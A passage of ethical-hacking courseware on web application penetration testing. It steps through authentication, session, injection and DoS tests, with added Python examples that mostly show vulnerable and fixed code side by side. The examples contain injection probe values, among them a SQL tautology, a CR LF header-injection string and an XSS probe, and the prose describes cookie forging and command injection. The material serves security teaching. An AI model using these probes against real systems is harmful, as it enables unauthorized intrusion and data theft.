Test the configuration management of infrastructure using CGI scanners and reviewing the contents of the web server, application server, comments, configuration, and logs. This gives you information about the source code, log files, and default error codes.


Step 4: Test for file extensions handling


Use vulnerability scanners, spidering and mirroring tools, search engine queries, or manual inspection to test for file extensions handling. This may reveal confidential information about access credentials.

Step 5: Verify the presence of old, backup, and unreferenced files


Review source code and enumerate application pages and functionality to verify the old, backup, and unreferenced files. This may reveal the installation paths and passwords for applications and databases.

Step 6: Test for infrastructure and application admin interfaces


Perform directory and file enumeration, review server and application documentation, etc. to test for infrastructure and application admin interfaces. Admin interfaces can be used to gain access to the admin functionality.

Step 7: Test for HTTP methods and XST


Review OPTIONS HTTP method using Netcat or Telnet to test for HTTP methods and XST. This may reveal credentials of legitimate users.


[Slide: Authentication Testing. Flowchart of steps 1 to 5 and their outcomes: test for vulnerable remember password and password reset (authentication vulnerabilities); test for logout and browser cache management (authentication vulnerabilities); test for CAPTCHA (authentication vulnerabilities); test for multiple-factor authentication (multiple-factor authentication vulnerabilities); test for race conditions (race conditions).]

Authentication Testing
You need to perform the following steps to carry out authentication testing:

Step 1: Test for vulnerable remember password and password reset


Test for vulnerable remember password and password reset by attempting to reset passwords by guessing, social engineering, or cracking secret questions, if used. Check if a "remember my password" mechanism is implemented by checking the HTML code of the login page; this can uncover password authentication weaknesses.

Step 2: Test for logout and browser cache management


Check if it is possible to "reuse" a session after logout. Also check if the application automatically logs out a user when that user has been idle for a certain amount of time, and that no sensitive data remains stored in the browser cache.

Step 3: Test for CAPTCHA


Identify all parameters that are sent in addition to the decoded CAPTCHA value from the client to the server and try to send an old decoded CAPTCHA value with an old CAPTCHA ID of an old session ID. This helps you to determine authentication vulnerabilities.


Step 4: Test for multiple-factor authentication


Check if users hold a hardware device of some kind in addition to the password. Check if the hardware device communicates directly and independently with the authentication infrastructure using an additional communication channel.

Step 5: Test for race conditions


Attempt to force a race condition and make multiple simultaneous requests while observing the outcome for unexpected behavior. Perform code review to check if there is a chance for race conditions.


[Slide: Session Management Testing. Flowchart of steps 1 to 5 and their outcomes: session management schema (cookie tampering results in hijacking the sessions of legitimate users); cookie attributes (cookie information to hijack a valid session); session fixation (attacker could steal the user session); exposed session variables (confidential information of the session token leads to a replay session attack); CSRF (compromises end-user data and operation or the entire web application).]

Session Management Testing

After testing the configuration management, test how the application manages the session. The following are the steps to conduct session management pen testing:

Step 1: Test for session management schema


Collect a sufficient number of cookie samples, analyze the cookie generation algorithm, and forge a valid cookie in order to perform the attack. This allows you to test your application against cookie tampering, which results in hijacking the sessions of legitimate users.

Step 2: Test for cookie attributes


Test for cookie attributes using intercepting proxies such as Webscarab, Burp Proxy, OWASP ZAP, or traffic-intercepting browser plugins such as TamperIE (for IE) and Tamper Data (for Firefox). If you are able to retrieve cookie information, then you can use this information to hijack a valid session.
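The two header reviews above, the OPTIONS check in configuration management step 7 (HTTP methods and XST) and the cookie attribute check here, both come down to reading response headers and flagging weak settings. The script below is an added example (not courseware code) that does both on raw responses of the kind Netcat or an intercepting proxy shows; the two sample responses are constructed, not captured from any real server, and the list of cookie-name hints used to pick out session cookies is an assumption of the example.

```python
"""Audit raw HTTP responses for risky methods and weak session cookies (added example)."""
from __future__ import annotations

# TRACE/TRACK enable cross-site tracing (XST); the others change server state.
RISKY_METHODS = {"TRACE", "TRACK", "PUT", "DELETE", "CONNECT"}
# Assumed substrings that mark a cookie as session-bearing (example heuristic).
SESSION_COOKIE_HINTS = ("sess", "sid", "auth", "token")

# Constructed OPTIONS reply (not a real capture).
SAMPLE_OPTIONS_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Allow: GET,HEAD,POST,OPTIONS,TRACE\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

# Constructed post-login reply (not a real capture): one weak session cookie,
# one non-session cookie, one hardened session cookie.
SAMPLE_LOGIN_RESPONSE = (
    "HTTP/1.1 302 Found\r\n"
    "Location: /home\r\n"
    "Set-Cookie: JSESSIONID=abc123; Path=/\r\n"
    "Set-Cookie: theme=dark; Path=/\r\n"
    "Set-Cookie: auth_token=xyz; Path=/; Secure; HttpOnly; SameSite=Strict\r\n"
    "\r\n"
)


def parse_headers(raw: str) -> list[tuple[str, str]]:
    """Return (lowercase name, value) pairs from the header block, keeping duplicates."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers = []
    for line in head.split("\r\n")[1:]:  # skip the status line
        if ":" in line:
            name, value = line.split(":", 1)
            headers.append((name.strip().lower(), value.strip()))
    return headers


def risky_methods(raw: str) -> list[str]:
    """Methods advertised in Allow that a hardened server should not expose."""
    allowed = set()
    for name, value in parse_headers(raw):
        if name == "allow":
            allowed.update(m.strip().upper() for m in value.split(","))
    return sorted(allowed & RISKY_METHODS)


def cookie_findings(raw: str) -> dict[str, list[str]]:
    """Session cookies missing Secure, HttpOnly or SameSite, keyed by cookie name."""
    findings: dict[str, list[str]] = {}
    for name, value in parse_headers(raw):
        if name != "set-cookie":
            continue
        parts = [p.strip() for p in value.split(";")]
        cookie_name = parts[0].split("=", 1)[0]
        if not any(hint in cookie_name.lower() for hint in SESSION_COOKIE_HINTS):
            continue  # only session-bearing cookies need the hardened attributes
        attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}
        missing = [a for a in ("secure", "httponly", "samesite") if a not in attrs]
        if missing:
            findings[cookie_name] = missing
    return findings


if __name__ == "__main__":
    print("risky methods:", risky_methods(SAMPLE_OPTIONS_RESPONSE))
    print("weak session cookies:", cookie_findings(SAMPLE_LOGIN_RESPONSE))
```

The remediation for each finding is a server-side setting: disable TRACE/TRACK and any method the application does not use, and set Secure, HttpOnly and SameSite on every cookie that carries session state.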

Step 3: Test for session fixation


To test for session fixation, make a request to the site to be tested and analyze vulnerabilities using the WebScarab tool. This helps you to determine whether your application is vulnerable to session hijacking.


Step 4: Test for exposed session variables


Confidential information of session token leads to a replay session attack. Therefore, test for exposed session variables by inspecting encryption and reuse of session token, proxies and caching, GET and POST, and transport vulnerabilities.

Step 5: Test for CSRF (Cross Site Request Forgery)


Examine the URLs in the restricted area to test for CSRF. A CSRF attack compromises end-user data and operation or the entire web application.


[Slide: Authorization Testing. Flowchart of steps 1 to 3: test for path traversal (can gain access to reserved information); test for bypassing authorization schema (access to resources assigned to a different role); test for role/privilege manipulation.]

Authorization Testing


Follow the steps here to test the web application against authorization vulnerabilities:

Step 1: Test for path traversal


Test for path traversal by performing input vector enumeration and analyzing the input validation functions present in the web application. Path traversal allows attackers to gain access to reserved information.

Step 2: Test for bypassing authorization schema


Test for bypassing authorization schema by examining the admin functionalities, to gain access to the resources assigned to a different role. If the attacker succeeds in bypassing the authorization schema, he or she can gain illegal access to reserved functions/resources.

Step 3: Test for privilege escalation


Test for role/privilege manipulation. If the attacker has access to resources/functionality, then he or she can perform a privilege escalation attack.


[Slide: Data Validation Testing. Flowchart of steps 1 to 6 and their outcomes: reflected cross-site scripting (session cookie information); stored cross-site scripting (sensitive information such as session authorization tokens); DOM-based cross-site scripting (information on DOM-based XSS vulnerabilities); cross-site flashing (cookie information); SQL injection testing (database information); LDAP injection testing (sensitive information about users and hosts).]

Data Validation Testing


Web applications must employ proper data validation methods. Otherwise, there may be a chance for the attacker to break into the communication between the client and the server, and inject malicious data. Hence, the data validation pen testing must be conducted to ensure that the current data validation methods or techniques employed by the web application offer appropriate security. Follow the steps here to perform data validation testing:

Step 1: Test for reflected cross-site scripting


In a reflected cross-site scripting attack, the attacker crafts a URL that exploits the reflected XSS vulnerability and sends it to the client in a spam mail. If the victim clicks the link, believing it comes from a trusted server, the malicious script embedded by the attacker in the URL executes in the victim's browser and sends the victim's session cookie to the attacker. Using this session cookie, the attacker can steal the sensitive information of the victim. Hence, to avoid this kind of attack, you must check your web applications against reflected XSS attacks. If you put proper data validation mechanisms in place, then you can easily determine whether the URL came originally from the server or was crafted by the attacker. Detect and analyze input vectors for potential vulnerabilities, analyze the vulnerability report, and attempt to exploit it. Use tools such as OWASP CAL9000, Hackvertor, BeEF, XSS-Proxy, Backframe, WebScarab, XSS Assistant, and Burp Proxy.
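As an added example (not courseware code), the snippet below shows the input-vector check described in Step 1 on a minimal search page: the vulnerable handler echoes the query into HTML unchanged, the fixed handler HTML-encodes it, and a small checker reports whether a probe string containing the characters that matter in HTML survives the round trip. The page template and probe string are constructed for the example.

```python
"""Reflected XSS: vulnerable vs. encoded output, plus a reflection check (added example)."""
import html

# Constructed probe: the characters whose survival in the page is the finding.
PROBE = "<\"probe'>"


def render_search_vulnerable(query: str) -> str:
    """Vulnerable: the user-supplied query is concatenated into HTML as-is."""
    return f"<p>Results for: {query}</p>"


def render_search_fixed(query: str) -> str:
    """Fixed: encode the value for the HTML text/attribute context before output."""
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


def reflects_unescaped(probe: str, page: str) -> bool:
    """True when the probe appears verbatim in the response, meaning the
    special characters < > " ' were not encoded on output."""
    return probe in page


def reflection_report(render) -> str:
    """One-line verdict for a page handler, as a tester would log it."""
    page = render(PROBE)
    return "reflected unescaped" if reflects_unescaped(PROBE, page) else "encoded"


if __name__ == "__main__":
    print("vulnerable handler:", reflection_report(render_search_vulnerable))
    print("fixed handler:     ", reflection_report(render_search_fixed))
```

html.escape is the right fix only for the HTML text and attribute contexts; a value placed inside a script block, a URL or a CSS rule needs the encoder for that context, so the tester's check should be repeated per reflection point.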


Step 2: Test for stored cross-site scripting


Analyze HTML code, test for Stored XSS, leverage Stored XSS and verify if the file upload allows setting arbitrary MIME types using tools such as OWASP CAL9000, Hackvertor, BeEF, XSS-Proxy, Backframe, WebScarab, Burp, and XSS Assistant. Stored XSS attacks allow attackers to uncover sensitive information such as session authorization tokens.

Step 3: Test for DOM-based cross-site scripting


DOM XSS attack stands for document object model based cross-site scripting attack, which affects the client's browser script code. In this attack, the input is taken from the user and then some malicious action is performed with it, which in turn leads to the execution of injected malicious code. Web applications can be tested against DOM XSS attacks by performing source code analysis to identify JavaScript coding errors.

Step 4: Test for cross site flashing


Analyze SWF files using tools such as SWFIntruder, Decompiler - Flare, Compiler - MTASC, Disassembler - Flasm, Swfmill, and Debugger Version of the Flash Plugin/Player. Flawed flash applications may contain DOM-based XSS vulnerabilities. The test for cross-site flashing gives information on DOM-based cross-site scripting vulnerabilities.

Step 5: Perform SQL injection testing


Perform standard SQL injection testing, union query SQL injection testing, blind SQL injection testing, and stored procedure injection using tools such as OWASP SQLiX, sqlninja, SqlDumper, sqlbftools, SQL Power Injector, etc. SQL injection attacks give database information to the attacker.
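As an added example (not courseware code), the script below shows what standard SQL injection testing detects and why: a login query built by string concatenation breaks on a stray quote and accepts a tautology, while the parameterized version does neither. It uses an in-memory SQLite database with constructed rows; the plaintext passwords are only for the demonstration.

```python
"""SQL injection: concatenated query vs. parameterized query (added example)."""
import sqlite3

# Constructed input used in standard SQL injection testing: a tautology that
# makes the WHERE clause true for every row when it is spliced into the query.
TAUTOLOGY = "' OR '1'='1"


def make_db() -> sqlite3.Connection:
    """In-memory table with constructed sample users (not real credentials)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "wonderland"), ("bob", "builder")])
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Vulnerable: user input becomes part of the SQL text."""
    sql = (f"SELECT 1 FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return conn.execute(sql).fetchone() is not None


def login_fixed(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Fixed: bound parameters keep the input as data, never as SQL."""
    sql = "SELECT 1 FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def quote_probe_breaks_query(login, conn: sqlite3.Connection) -> bool:
    """The first probe of standard SQL injection testing: does a single quote
    in the input produce a database error? True means the input reached the
    SQL parser unparameterized."""
    try:
        login(conn, "alice'", "x")
    except sqlite3.Error:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, quote probe errors:", quote_probe_breaks_query(login_vulnerable, db))
    print("vulnerable, tautology logs in: ", login_vulnerable(db, "alice", TAUTOLOGY))
    print("fixed, quote probe errors:     ", quote_probe_breaks_query(login_fixed, db))
    print("fixed, tautology logs in:      ", login_fixed(db, "alice", TAUTOLOGY))
```

The database error on the quote probe is the same signal the tools listed above automate; in a hardened application the probe is just a wrong password, the error never reaches the client, and the tautology is compared literally against the stored value.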

Step 6: Perform LDAP injection testing


Use a trial and error approach by inserting '(', '|', and the other characters in order to check the application for errors. Use the tool Softerra LDAP Browser. The LDAP injection may reveal sensitive information about users and hosts.


[Slide: Data Validation Testing (Contd). Flowchart of steps 7 to 11 and their outcomes: ORM injection testing (information on SQL injection vulnerability); XML injection testing (information about XML structure); SSI injection testing (web server CGI environment variables); XPath injection testing (access to confidential information); IMAP/SMTP injection testing (access to the backend mail server).]

Data Validation Testing (Contd)
Step 7: Perform ORM injection testing
Perform ORM injection testing to discover vulnerabilities of an ORM tool and test web applications that use ORM. Use tools such as Hibernate, Nhibernate, and Ruby On Rails. This test gives information on SQL injection vulnerabilities.

Step 8: Perform XML injection testing


To perform XML injection testing, try to insert XML metacharacters and observe the response. A successful XML injection may give information about the XML structure.

Step 9: Perform SSI injection testing


Perform SSI injection testing and find out whether the web server actually supports SSI directives, using tools such as Web Proxy Burp Suite, Paros, WebScarab, and the string searcher grep. If the attacker can inject SSI directives, then he or she can set or print web server CGI environment variables.

Step 10: Perform XPath injection testing


Inject XPath code and interfere with the query result. XPath injection allows the attacker to access confidential information.


Step 11: Perform IMAP/SMTP injection testing


Perform IMAP/SMTP injection testing to identify vulnerable parameters. Understand the data flow and deployment structure of the client, and perform IMAP/SMTP command injection. Malicious IMAP/SMTP commands allow attackers to access the backend mail server.


[Slide: Data Validation Testing (Contd). Flowchart of steps 12 to 16 and their outcomes: code injection testing (input validation errors); OS commanding (local data and system information); buffer overflow testing (stack and heap memory information, application control flow); incubated vulnerability testing (server configuration and input validation schemes); HTTP splitting/smuggling (cookies and HTTP redirect information).]

Data Validation Testing (Contd)

Step 12: Perform code injection testing

To perform code injection testing, inject code (a malicious URL) and perform source code analysis to discover code injection vulnerabilities. It gives information about input validation errors.

Step 13: Perform OS commanding


Perform manual code analysis and craft malicious HTTP requests using | to test for OS command injection attacks. OS commanding may reveal local data and system information.

Step 14: Perform buffer overflow testing


Perform manual and automated code analysis using tools such as OllyDbg to detect buffer overflow conditions. This may help you to determine stack and heap memory information and application control flow.

Step 15: Perform incubated vulnerability testing


Upload a file that exploits a component on the local user workstation when viewed or downloaded by the user, and perform XSS and SQL injection attacks. Incubated vulnerabilities may give attackers information about server configuration and input validation schemes.


Step 16: Test for HTTP splitting/smuggling


Identify all user-controlled input that influences one or more headers in the response and check whether an attacker can successfully inject a CR+LF sequence into it. Attackers perform HTTP splitting/smuggling to obtain cookies and HTTP redirect information.
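As an added example (not courseware code), the snippet below shows the CR+LF check from Step 16 on a redirect handler: one builder copies the user-controlled target into the Location header, the other rejects any value containing CR or LF, and a checker reports whether a percent-encoded CR LF probe in the parameter yields an extra header line. The handlers and the probe parameter are constructed for the example.

```python
"""HTTP response splitting: CR/LF in a header value, and the rejecting fix (added example)."""
from __future__ import annotations

from urllib.parse import unquote

# Constructed test input: a redirect target carrying a percent-encoded CR LF
# followed by a harmless marker header.
PROBE_PARAM = "/home%0d%0aX-Probe:%201"


def build_redirect_vulnerable(target: str) -> bytes:
    """Vulnerable: the decoded parameter is written straight into a header line."""
    return f"HTTP/1.1 302 Found\r\nLocation: {target}\r\n\r\n".encode()


def build_redirect_fixed(target: str) -> bytes:
    """Fixed: a header value may never contain CR or LF; refuse the request."""
    if "\r" in target or "\n" in target:
        raise ValueError("CR/LF is not allowed in a header value")
    return f"HTTP/1.1 302 Found\r\nLocation: {target}\r\n\r\n".encode()


def header_names(response: bytes) -> list[str]:
    """Header names as a client would parse them from the response head."""
    head = response.split(b"\r\n\r\n", 1)[0].decode()
    return [line.split(":", 1)[0] for line in head.split("\r\n")[1:] if ":" in line]


def crlf_probe_adds_header(builder, raw_param: str) -> bool:
    """Tester's check: after URL-decoding, does the probe produce more than the
    one header the handler intends to send?"""
    try:
        response = builder(unquote(raw_param))
    except ValueError:
        return False  # the handler refused the value: not splittable
    return len(header_names(response)) > 1


if __name__ == "__main__":
    print("vulnerable handler splittable:", crlf_probe_adds_header(build_redirect_vulnerable, PROBE_PARAM))
    print("fixed handler splittable:     ", crlf_probe_adds_header(build_redirect_fixed, PROBE_PARAM))
```

Most current web frameworks already refuse CR/LF in header values; the check is still worth running because the defect reappears wherever code writes headers by hand or sits behind a proxy that parses the stream differently.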


[Slide: Denial of Service Testing. Flowchart of steps 1 to 4 and their outcomes: SQL wildcard attacks (application information); locking customer accounts (login account information); buffer overflows (buffer overflow points); user specified object allocation (maximum number of objects that the application can handle).]

Denial of Service Testing
To check your web application against DoS attacks, follow these steps:

Step 1: Test for SQL wildcard attacks


Craft a query that will not return a result and includes several wildcards. Test manually or employ a fuzzer to automate the process.

Step 2: Test for locking customer accounts


Test that an account does indeed lock after a certain number of failed logins. Find places where the application discloses the difference between valid and invalid logins. If your web application doesn't lock customer accounts after a certain number of failed logins, then there is a possibility for the attacker to crack customer passwords by employing brute force attacks, dictionary attacks, etc.
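As an added example (not courseware code), the class below implements the behaviour the two checks in Step 2 look for: a configurable lockout after a fixed number of failed logins, and a single generic message for unknown users, wrong passwords and locked accounts, so the response does not disclose which case occurred. The credential table, thresholds and the injectable clock are constructed for the example; a real application compares against stored password hashes rather than plaintext.

```python
"""Account lockout with a non-disclosing login response (added example)."""
from __future__ import annotations

import hmac
import time
from collections import defaultdict


class LoginGuard:
    """Locks an account after max_failures bad attempts for lockout_seconds."""

    GENERIC_ERROR = "Invalid username or password."

    def __init__(self, credentials: dict[str, str], max_failures: int = 5,
                 lockout_seconds: float = 900.0, clock=time.monotonic) -> None:
        self._credentials = credentials        # constructed username -> password table
        self._max_failures = max_failures
        self._lockout_seconds = lockout_seconds
        self._clock = clock                    # injectable so tests can advance time
        self._failures: dict[str, int] = defaultdict(int)
        self._locked_until: dict[str, float] = {}

    def is_locked(self, username: str) -> bool:
        return self._clock() < self._locked_until.get(username, 0.0)

    def attempt(self, username: str, password: str) -> tuple[bool, str]:
        """Return (success, message). The message is identical for an unknown
        user, a wrong password and a locked account."""
        if self.is_locked(username):
            return False, self.GENERIC_ERROR
        expected = self._credentials.get(username, "")
        # Constant-time comparison; the empty default keeps the unknown-user
        # path doing the same work as the wrong-password path.
        ok = username in self._credentials and hmac.compare_digest(
            expected.encode(), password.encode())
        if ok:
            self._failures.pop(username, None)
            return True, "ok"
        self._failures[username] += 1
        if self._failures[username] >= self._max_failures:
            self._locked_until[username] = self._clock() + self._lockout_seconds
            self._failures.pop(username, None)  # counter restarts after the lock expires
        return False, self.GENERIC_ERROR


if __name__ == "__main__":
    guard = LoginGuard({"alice": "correct-horse"}, max_failures=3, lockout_seconds=60)
    for _ in range(3):
        print(guard.attempt("alice", "wrong"))
    print("locked:", guard.is_locked("alice"))
    print(guard.attempt("alice", "correct-horse"))  # refused while locked
```

Lockout is itself a denial-of-service lever, which is why this test sits in the DoS section: anyone who knows a username can trigger the lock against its legitimate owner. Keep the lockout time-limited rather than permanent and pair the per-account counter with per-source rate limiting.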

Step 3: Test for buffer overflows


Perform a manual source code analysis and submit a range of inputs with varying lengths to the application to test for buffer overflows.

Step4: Test for user specified object allocation


Find where the numbers submitted as a name/value pair might be used by the application code and attempt to set the value to an extremely large numeric value, and then see if the server

Module 13 Page 1979

Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking W eb Applications

Exam 312-50 Certified Ethical Hacker

continues to respond. If the attacker knows the maximum number of objects that the application can handle, he or she can exploit the application by sending objects beyond maximum limit.
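The account-lockout check in Step 2, as an added example that is not part of the course material: a minimal login service with the two controls the test looks for (a lock after a fixed number of failures, and one generic failure message for every failure path) together with the black-box probes a tester runs against it. The threshold, lock duration, in-memory user store and function names are assumptions made for the example.

```python
import hmac
import time
from dataclasses import dataclass, field
from typing import Callable, Dict, Tuple

# Constructed credential store for the example only. A real application stores
# password hashes and compares against the hash, never plaintext.
USERS = {"alice": "correct horse battery staple"}

FAIL_THRESHOLD = 5   # assumed policy: failed logins before the account locks
LOCK_SECONDS = 900   # assumed policy: how long the lock lasts

# One message for every failure path (unknown user, wrong password, locked
# account), so a response never reveals whether a username exists or is locked.
GENERIC_FAILURE = "Invalid username or password."


@dataclass
class LoginService:
    users: Dict[str, str]
    fail_threshold: int = FAIL_THRESHOLD
    lock_seconds: int = LOCK_SECONDS
    clock: Callable[[], float] = time.time   # injectable so a test can advance time
    failures: Dict[str, int] = field(default_factory=dict)
    locked_until: Dict[str, float] = field(default_factory=dict)

    def is_locked(self, username: str) -> bool:
        return self.locked_until.get(username, 0.0) > self.clock()

    def login(self, username: str, password: str) -> Tuple[bool, str]:
        """Return (success, message)."""
        if self.is_locked(username):
            return False, GENERIC_FAILURE
        # Compare against an empty placeholder for unknown users too, so valid
        # and invalid usernames go through the same comparison.
        expected = self.users.get(username, "")
        matched = hmac.compare_digest(expected.encode(), password.encode())
        if matched and username in self.users:
            self.failures.pop(username, None)
            return True, "Welcome"
        count = self.failures.get(username, 0) + 1
        if count >= self.fail_threshold:
            self.locked_until[username] = self.clock() + self.lock_seconds
            self.failures.pop(username, None)
        else:
            self.failures[username] = count
        return False, GENERIC_FAILURE


def probe_lockout(service: LoginService, username: str, attempts: int) -> dict:
    """Step 2 as a black-box check: send `attempts` wrong passwords and report
    whether the account locked and which distinct messages came back."""
    messages = {service.login(username, "not-the-password")[1] for _ in range(attempts)}
    return {"locked": service.is_locked(username), "messages": messages}


def responses_differ(service: LoginService, valid_user: str, unknown_user: str) -> bool:
    """Step 2's disclosure check: does a valid username get a different failure
    message from an unknown one?"""
    a = service.login(valid_user, "not-the-password")[1]
    b = service.login(unknown_user, "not-the-password")[1]
    return a != b


if __name__ == "__main__":
    svc = LoginService(users=dict(USERS))
    print(probe_lockout(svc, "alice", FAIL_THRESHOLD))
    print("discloses valid users:", responses_differ(svc, "alice", "mallory"))
```

The two probes are what the tester records: whether the lock engages at the threshold, whether a correct password is refused while the lock holds, and whether the failure text or behaviour changes between a real and a made-up username.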


Denial-of-Service Testing (Cont'd) (slide summary)

Test for user input as a loop counter (logical errors in an application): enter an extremely large number in the input field that is used by the application as a loop counter.

Write user-provided data to disk (local disk exhaustion): use a script to automatically submit an extremely long value to the server in the request that is being logged.

Test for proper release of resources (programming flaws): identify and send a large number of requests that perform database operations and observe any slowdown or new error messages.

Test for storing too much data in session (session management errors): create a script to automate the creation of many new sessions with the server and run the request that is suspected of caching the data within the session for each one.

Denial-of-Service Testing (Cont'd)
Step 5: Test for user input as a loop counter

Enter an extremely large number in an input field that the application uses as a loop counter. If the application fails to behave in its predefined manner, the application contains a logical error.

Step 6: Write user-provided data to disk

Use a script to automatically submit an extremely long value to the server in a request that is being logged.

Step 7: Test for proper release of resources

Identify and send a large number of requests that perform database operations and observe any slowdown or new error messages.

Step 8: Test for storing too much data in session

Create a script to automate the creation of many new sessions with the server and, for each one, run the request that is suspected of caching data within the session.
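Steps 1, 4, 5, 6 and 8 share one root cause: user input decides how much work or storage the server will do. The following is an added example, not course material, of the server-side bounds a developer puts on each of those inputs, with a small driver that reports which constructed sample inputs are rejected. The limits and function names are assumptions chosen for the example.

```python
import json
import re

# Assumed limits; a real application sizes them from its own capacity.
MAX_PATTERN_LEN = 64      # longest LIKE pattern accepted from a user (step 1)
MAX_WILDCARDS = 2         # '%' and '_' allowed per pattern (step 1)
MAX_OBJECT_COUNT = 100    # largest count or loop bound accepted (steps 4 and 5)
MAX_LOG_FIELD = 512       # longest user value written to a log line (step 6)
MAX_SESSION_BYTES = 4096  # serialized session budget (step 8)


class ResourceLimitError(ValueError):
    """Raised when an input would let the caller consume unbounded resources."""


def escape_like(term: str) -> str:
    """Escape LIKE metacharacters so user text is matched literally
    (pair with ESCAPE '\\' in the SQL statement)."""
    return term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def bounded_like_pattern(user_input: str) -> str:
    """Accept a user-supplied LIKE pattern only if it is short and has few
    wildcards; wildcard-heavy patterns force full scans (step 1)."""
    if len(user_input) > MAX_PATTERN_LEN:
        raise ResourceLimitError("pattern too long")
    if user_input.count("%") + user_input.count("_") > MAX_WILDCARDS:
        raise ResourceLimitError("too many wildcards")
    return user_input


def bounded_count(raw: str, upper: int = MAX_OBJECT_COUNT) -> int:
    """Parse a count or loop bound from a name/value pair and cap it (steps 4 and 5)."""
    if not re.fullmatch(r"\d{1,9}", raw.strip()):
        raise ResourceLimitError("count must be a small positive integer")
    n = int(raw)
    if not 1 <= n <= upper:
        raise ResourceLimitError("count must be between 1 and %d" % upper)
    return n


def truncate_for_log(value: str) -> str:
    """Never write an unbounded user value to disk through the log (step 6)."""
    if len(value) <= MAX_LOG_FIELD:
        return value
    return value[:MAX_LOG_FIELD] + "...[truncated]"


def store_in_session(session: dict, key: str, value) -> int:
    """Add a value to the session only if the whole session stays within
    budget (step 8); returns the new serialized size in bytes."""
    candidate = dict(session)
    candidate[key] = value
    size = len(json.dumps(candidate).encode("utf-8"))
    if size > MAX_SESSION_BYTES:
        raise ResourceLimitError("session budget exceeded")
    session[key] = value
    return size


# Constructed inputs: one benign and one abusive value per check.
SAMPLES = [
    ("plain search", bounded_like_pattern, "acme"),
    ("wildcard flood", bounded_like_pattern, "%_%_%_%a"),
    ("count ok", bounded_count, "25"),
    ("count huge", bounded_count, "99999999999"),
    ("session small", lambda v: store_in_session({}, "cart", v), ["item"] * 10),
    ("session huge", lambda v: store_in_session({}, "cart", v), ["item"] * 2000),
]


def evaluate(samples=SAMPLES):
    """Run each (name, check, input) triple and report accepted/rejected,
    in the shape a fuzzer's log would take."""
    results = []
    for name, check, arg in samples:
        try:
            check(arg)
            results.append((name, "accepted"))
        except ResourceLimitError as exc:
            results.append((name, "rejected: %s" % exc))
    return results


if __name__ == "__main__":
    for name, verdict in evaluate():
        print("%-15s %s" % (name, verdict))
```

When the tester's oversized counter, wildcard-laden search or session-filling loop is met by one of these rejections rather than a slow or absent response, the corresponding step passes.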


Web Services Testing (slide summary)

To gather WS information, use tools such as wsChess, Soaplite, CURL, Perl, etc. and online tools such as UDDI Browser, WSIndex, and Xmethods.

Use tools such as WSDigger, WebScarab, and Foundstone to automate web services security testing.

Pass malformed SOAP messages to the XML parser or attach a very large string to the message. Use WSDigger to perform automated XML structure testing.

Use web application vulnerability scanners such as WebScarab to test XML content-level vulnerabilities.

Pass malicious content on the HTTP GET strings that invoke XML applications.

Craft an XML document (SOAP message) to send to a web service that contains malware as an attachment to check whether the XML document has a SOAP attachment vulnerability.

Attempt to resend a sniffed XML message using Wireshark and WebScarab.

Information gathered by these tests: SQL, XPath, buffer overflow, and command injection vulnerabilities; MITM vulnerability; HTTP GET/REST attack vectors; SOAP message information.

Web Services Testing
Step 1: Gather WS information

Gather WS information using tools such as Net Square wsChess, Soaplite, CURL, Perl, etc. and online tools such as UDDI Browser, WSIndex, and Xmethods.

Step 2: Test WSDL

Test the WSDL to determine the various entry points it exposes. You can automate web services security testing using tools such as WSDigger, WebScarab, and Foundstone.

Step 3: Test XML structure

Pass malformed SOAP messages to the XML parser or attach a very large string to the message. Use WSDigger to perform automated XML structure testing.

Step 4: Test XML content-level

Use web application vulnerability scanners such as WebScarab to test for XML content-level vulnerabilities.

Step 5: Test HTTP GET parameters/REST

Pass malicious content in the HTTP GET strings that invoke XML applications.


Step 6: Test naughty SOAP attachments

Craft an XML document (SOAP message) that contains malware as an attachment and send it to the web service to check whether the service is vulnerable to malicious SOAP attachments.

Step 7: Perform replay testing

Attempt to resend a sniffed XML message using Wireshark and WebScarab. This test gives information about MITM vulnerability.
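An added example, not from the course or from any of the tools it names, of the parser-side controls that the XML structure test in Step 3 probes: the function parses a SOAP message with the standard library's expat parser while enforcing size, nesting-depth and text-length limits and refusing DOCTYPE declarations, then runs over a set of constructed messages. The limits, names and message bodies are assumptions made for the example.

```python
from xml.parsers import expat

# Assumed limits for the example; a real gateway sets them from its own capacity.
MAX_MESSAGE_BYTES = 64 * 1024   # whole request body
MAX_DEPTH = 32                  # element nesting
MAX_TEXT_BYTES = 8 * 1024       # character data inside one element


class RejectedMessage(Exception):
    """The message broke a structural limit or was not well-formed XML."""


def check_soap_message(data: bytes) -> dict:
    """Parse `data` with expat while enforcing the limits above.

    Returns parse statistics for an accepted message and raises RejectedMessage
    otherwise, so the oversized or malformed inputs of Step 3 are dropped before
    they reach the real SOAP stack.
    """
    if len(data) > MAX_MESSAGE_BYTES:
        raise RejectedMessage("message exceeds %d bytes" % MAX_MESSAGE_BYTES)

    stats = {"elements": 0, "max_depth": 0, "max_text": 0}
    depth = 0
    text_in_element = 0

    def start_element(name, attrs):
        nonlocal depth, text_in_element
        depth += 1
        text_in_element = 0
        stats["elements"] += 1
        stats["max_depth"] = max(stats["max_depth"], depth)
        if depth > MAX_DEPTH:
            raise RejectedMessage("nesting deeper than %d" % MAX_DEPTH)

    def end_element(name):
        nonlocal depth, text_in_element
        depth -= 1
        text_in_element = 0

    def character_data(text):
        # expat may deliver one text node in several chunks, so accumulate per element.
        nonlocal text_in_element
        text_in_element += len(text.encode("utf-8"))
        stats["max_text"] = max(stats["max_text"], text_in_element)
        if text_in_element > MAX_TEXT_BYTES:
            raise RejectedMessage("text node longer than %d bytes" % MAX_TEXT_BYTES)

    def start_doctype(name, sysid, pubid, has_internal_subset):
        # SOAP messages carry no DTD; refusing one also blocks entity-expansion tricks.
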